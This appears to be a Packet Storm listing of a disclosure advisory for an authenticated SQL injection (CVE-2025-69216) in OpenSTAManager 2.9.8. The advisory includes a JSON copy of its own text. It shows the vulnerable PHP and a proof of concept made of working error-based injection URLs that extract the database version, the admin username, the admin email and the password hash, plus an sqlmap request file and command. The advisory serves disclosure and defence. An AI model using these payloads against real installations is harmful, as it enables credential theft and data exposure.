📄 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218752

8.7 / 10

HIGH

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/SC:N/VI:H/SI:N/VA:H/SA:N

Description

OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in the Scadenzario Print Template...

Visit Original Source

Basic Information

ID PACKETSTORM:218752

Published Apr 13, 2026 at 00:00

Affected Product

Affected Versions # CVE-2025-69216: OpenSTAManager has a SQL Injection in Scadenzario Print Template

## Overview

| Field | Details |
|---|---|
| **CVE ID** | [CVE-2025-69216](https://nvd.nist.gov/vuln/detail/CVE-2025-69216) |
| **Severity** | HIGH |
| **Advisory** | [View Advisory](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6) |
| **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |

## Affected Products

- **devcode-it/openstamanager** (versions: <= 2.9.8)

## CWE Classification

- CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

## Details

### Summary
An **authenticated SQL injection vulnerability** in OpenSTAManager's Scadenzario (Payment Schedule) print template allows any authenticated user to extract sensitive data from the database, including admin credentials, customer information, and financial records. The vulnerability enables complete database read access through error-based SQL injection techniques.

### Details

The vulnerability exists in `templates/scadenzario/init.php` at **line 46**, where the `id_anagrafica` parameter is directly concatenated into an SQL query without proper sanitization:

**Vulnerable Code:**
```php
if (get('id_anagrafica') && get('id_anagrafica') != 'null') {
$module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query);
$id_anagrafica = get('id_anagrafica');
}
```

The `get()` function retrieves user input from GET/POST parameters without validation. The parameter value is directly embedded into the SQL query string using string concatenation instead of using the application's `prepare()` sanitization function, enabling SQL injection attacks.

**Root Cause:**
- Missing use of `prepare()` function for input sanitization
- Direct string concatenation in SQL query construction
- No input validation or type checking

**Affected Endpoint:**
```
/pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD]
```

**Affected Files:**
- `templates/scadenzario/init.php` (line 46) - **Primary vulnerability**
- `templates/scadenzario/init.php` (lines 34, 40) - Similar pattern with date parameters
- `pdfgen.php` - Entry point for template rendering

---

### PoC (Proof of Concept)

#### Prerequisites
- Valid authenticated session (any user role)

#### Exploitation Steps

**1. Confirm Vulnerability - Basic Syntax Error Test:**
```bash
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20
```

SQL syntax error displayed in application response

<img width="2195" height="392" alt="image" src="https://github.com/user-attachments/assets/f62ca7b4-2397-4f90-8698-6cf7f867d102" />

---

**2. Extract Database Version - Error-Based SQLi:**
```bash
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221
```

**Result:** `~8.3.0~` (MySQL version)

<img width="2061" height="378" alt="image" src="https://github.com/user-attachments/assets/8ea16c47-36cc-4c25-a624-b42ccfcdf52f" />

---

**3. Extract Database Name:**
```bash
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221
```

**Result:** `~openstamanager~`

<img width="1954" height="345" alt="image" src="https://github.com/user-attachments/assets/47479297-5271-4c03-b242-efa513eb28f8" />

---

**4. Extract Admin Username:**
```bash
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221
```

**Result:** `~admin~`
<img width="1998" height="332" alt="image" src="https://github.com/user-attachments/assets/9f8363cb-8da9-4e8f-8744-ef38c9706be8" />

---

**5. Extract Admin Email:**
```bash
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221
```

**Result:** Admin email address

<img width="2006" height="339" alt="image" src="https://github.com/user-attachments/assets/4dcd5ea4-4eea-4730-8d39-b8ce2da46e84" />

---

**6. Extract Password Hash (Partial - XPATH 31 char limit):**
```bash
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221
```

**Result:** bcrypt password hash

<img width="1924" height="328" alt="image" src="https://github.com/user-attachments/assets/27b711f3-9bb6-4909-a5bd-a04177c9f219" />

---

**7. Automated Exploitation with SQLMap:**

Create request file `sqli_osm.req`:
```http
GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=[SESSION_COOKIE]
User-Agent: Mozilla/5.0
```

Run SQLMap:
```bash
sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs
```

**SQLMap Confirmed Injection Types:**
- ✅ Boolean-based blind SQL injection
- ✅ Error-based SQL injection (MySQL >= 5.6 GTID_SUBSET)
- ✅ Time-based blind SQL injection (SLEEP)

<img width="1498" height="516" alt="image" src="https://github.com/user-attachments/assets/b733f025-ac4b-4b36-a20e-76d826005f62" />

---

### Impact

**Who is Impacted:**
- ✅ **All authenticated users** - Any user with valid credentials can exploit this vulnerability
- ✅ **Low-privilege users** - Even users with minimal permissions can access admin-level data
- ✅ **All OpenSTAManager installations** - Vulnerability exists in the latest master branch
---

### Attribution
Reported by Łukasz Rybak

## References

- https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6
- https://nvd.nist.gov/vuln/detail/CVE-2025-69216
- https://github.com/advisories/GHSA-q6g3-fv43-m2w6

## Disclaimer

This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.

{
    "lastseen": "2026-04-13T15:49:41",
    "description": "OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in the Scadenzario Print Template...",
    "published": "2026-04-13T00:00:00",
    "modified": "2026-04-13T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:218752",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-69216"
    ],
    "sourceData": "# CVE-2025-69216: OpenSTAManager has a SQL Injection in Scadenzario Print Template\n    \n    ## Overview\n    \n    | Field | Details |\n    |---|---|\n    | **CVE ID** | [CVE-2025-69216](https://nvd.nist.gov/vuln/detail/CVE-2025-69216) |\n    | **Severity** | HIGH |\n    | **Advisory** | [View Advisory](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6) |\n    | **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |\n    \n    ## Affected Products\n    \n    - **devcode-it/openstamanager** (versions: <= 2.9.8)\n    \n    \n    ## CWE Classification\n    \n    - CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')\n    \n    ## Details\n    \n    ### Summary\n    An **authenticated SQL injection vulnerability** in OpenSTAManager's Scadenzario (Payment Schedule) print template allows any authenticated user to extract sensitive data from the database, including admin credentials, customer information, and financial records. The vulnerability enables complete database read access through error-based SQL injection techniques.\n    \n    ### Details\n    \n    The vulnerability exists in `templates/scadenzario/init.php` at **line 46**, where the `id_anagrafica` parameter is directly concatenated into an SQL query without proper sanitization:\n    \n    **Vulnerable Code:**\n    ```php\n    if (get('id_anagrafica') && get('id_anagrafica') != 'null') {\n        $module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`=\"'.get('id_anagrafica').'\"', $module_query);\n        $id_anagrafica = get('id_anagrafica');\n    }\n    ```\n    \n    The `get()` function retrieves user input from GET/POST parameters without validation. The parameter value is directly embedded into the SQL query string using string concatenation instead of using the application's `prepare()` sanitization function, enabling SQL injection attacks.\n    \n    **Root Cause:**\n    - Missing use of `prepare()` function for input sanitization\n    - Direct string concatenation in SQL query construction\n    - No input validation or type checking\n    \n    **Affected Endpoint:**\n    ```\n    /pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD]\n    ```\n    \n    **Affected Files:**\n    - `templates/scadenzario/init.php` (line 46) - **Primary vulnerability**\n    - `templates/scadenzario/init.php` (lines 34, 40) - Similar pattern with date parameters\n    - `pdfgen.php` - Entry point for template rendering\n    \n    \n    ---\n    \n    ### PoC (Proof of Concept)\n    \n    #### Prerequisites\n    - Valid authenticated session (any user role)\n    \n    #### Exploitation Steps\n    \n    **1. Confirm Vulnerability - Basic Syntax Error Test:**\n    ```bash\n     http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20\n    ```\n    \n    SQL syntax error displayed in application response\n    \n    <img width=\"2195\" height=\"392\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f62ca7b4-2397-4f90-8698-6cf7f867d102\" />\n    \n    ---\n    \n    **2. Extract Database Version - Error-Based SQLi:**\n    ```bash\n    http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221\n    ```\n    \n    **Result:** `~8.3.0~` (MySQL version)\n    \n    <img width=\"2061\" height=\"378\" alt=\"image\" src=\"https://github.com/user-attachments/assets/8ea16c47-36cc-4c25-a624-b42ccfcdf52f\" />\n    \n    ---\n    \n    **3. Extract Database Name:**\n    ```bash\n    http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221\n    ```\n    \n    **Result:** `~openstamanager~`\n    \n    <img width=\"1954\" height=\"345\" alt=\"image\" src=\"https://github.com/user-attachments/assets/47479297-5271-4c03-b242-efa513eb28f8\" />\n    \n    ---\n    \n    **4. Extract Admin Username:**\n    ```bash\n    http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221\n    ```\n    \n    **Result:** `~admin~`\n    <img width=\"1998\" height=\"332\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9f8363cb-8da9-4e8f-8744-ef38c9706be8\" />\n    \n    ---\n    \n    **5. Extract Admin Email:**\n    ```bash\n    http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221\n    ```\n    \n    **Result:** Admin email address\n    \n    <img width=\"2006\" height=\"339\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4dcd5ea4-4eea-4730-8d39-b8ce2da46e84\" />\n    \n    ---\n    \n    **6. Extract Password Hash (Partial - XPATH 31 char limit):**\n    ```bash\n    http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221\n    ```\n    \n    **Result:** bcrypt password hash\n    \n    <img width=\"1924\" height=\"328\" alt=\"image\" src=\"https://github.com/user-attachments/assets/27b711f3-9bb6-4909-a5bd-a04177c9f219\" />\n    \n    ---\n    \n    **7. Automated Exploitation with SQLMap:**\n    \n    Create request file `sqli_osm.req`:\n    ```http\n    GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1\n    Host: localhost:8081\n    Cookie: PHPSESSID=[SESSION_COOKIE]\n    User-Agent: Mozilla/5.0\n    ```\n    \n    Run SQLMap:\n    ```bash\n    sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs\n    ```\n    \n    **SQLMap Confirmed Injection Types:**\n    - \u2705 Boolean-based blind SQL injection\n    - \u2705 Error-based SQL injection (MySQL >= 5.6 GTID_SUBSET)\n    - \u2705 Time-based blind SQL injection (SLEEP)\n    \n    <img width=\"1498\" height=\"516\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b733f025-ac4b-4b36-a20e-76d826005f62\" />\n    \n    ---\n    \n    ### Impact\n    \n    **Who is Impacted:**\n    - \u2705 **All authenticated users** - Any user with valid credentials can exploit this vulnerability\n    - \u2705 **Low-privilege users** - Even users with minimal permissions can access admin-level data\n    - \u2705 **All OpenSTAManager installations** - Vulnerability exists in the latest master branch\n    ---\n    \n    ### Attribution\n    Reported by \u0141ukasz Rybak\n    \n    ## References\n    \n    - https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-69216\n    - https://github.com/advisories/GHSA-q6g3-fv43-m2w6\n    \n    \n    ## Disclaimer\n    \n    This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.",
    "sourceHref": "https://packetstorm.news/download/218752",
    "cvss": {
        "score": 8.7,
        "severity": "HIGH",
        "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/SC:N/VI:H/SI:N/VA:H/SA:N",
        "version": "4.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/218752/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply